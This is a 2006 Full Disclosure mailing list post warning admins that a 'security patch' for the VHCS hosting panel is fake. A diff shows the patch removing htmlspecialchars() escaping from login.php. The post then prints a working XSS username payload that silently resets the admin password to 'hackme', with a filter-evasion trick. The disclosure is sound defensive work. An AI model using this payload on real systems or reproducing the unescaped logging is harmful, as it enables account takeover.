Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

VHCS Security Patch - 2006-02-05 --> Fake!
From: Roman Medina-Heigl Hernandez <roman () rs-labs com>
Date: Sun, 05 Feb 2006 21:09:11 +0100


Hi,

I've just visited VHCS main page and noticed the following "security patch":

http://vhcs.net/new/modules/news/article.php?storyid=23

It reads:

"This patch is for all VHCS versions.
You have to update only one GUI file - /vhcs2/gui/include/login.php

Just replace the file
"

Well, just do NOT apply it!!!! It's a fake! Indeed it will leave your
VHCS installation vulnerable to a high severity cross-site-scripting issue!

See it:
login_orig_unix.php --> original 2.4.7.1 login.php (converted to Unix)
login_new_unix.php  --> login.php from "security patch"

roman () rs-labs:~$ diff login_orig_unix.php login_new_unix.php
38c38
<               write_log("Login error, <b><i>".htmlspecialchars($uname,
ENT_QUOTES, "UTF-8")."</i></b> unknown username");
---
              write_log("Login error, <b><i>".$uname."</i></b> unknown
username");
75c75
<
write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." Domain status
is not OK - user can not login");
---

write_log( $uname." Domain status is not OK - user can not login");
104c104
<                       write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user logged in.");
---
                      write_log( $uname." user logged in.");
112c112
<               write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad password login data.");
---
              write_log( $uname." bad password login data.");
190c190
<                       write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user session timed out");
---
                      write_log($uname." user session timed out");
199c199
<               write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad session data.");
---
              write_log($uname." bad session data.");
258a259
      die();
261a263
}
437c439
< }
---
//}
roman () rs-labs:~$


As you can see, the "patch" removes htmlspecialchars() calls letting
login.php vulnerable . Nasty...

If you apply the "patch" (or have an old VHCS install, for instance
version <= 2.4.6.2), the XSS bug is active. Just for fun, you can
exploit it by entering the following as "username" (in the login entry
page):

</form><form name="dsr" method="post" action="ch%61nge_password.php"><input
name="pass" value="hackme"><input name="pass_rep" value="hackme"><input
name="uaction"
value="updt_pass"></form><script>document.dsr.submit()</script>

When the VHCS admin enters the "Admin Log" page (in VHCS menu)... his
password will be set up to "hackme" :-) The %61 trick is necessary to
bypass some string substitution. This exploit combines the XSS bug with
what I see as a poor security design bug, which is letting change
password without supplying the old one (Alex, please, fix it in next
release!).

Summarizing, my recommendation: use VHCS 2.4.7.1, don't apply patch.

-- 

Cheers,
-Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]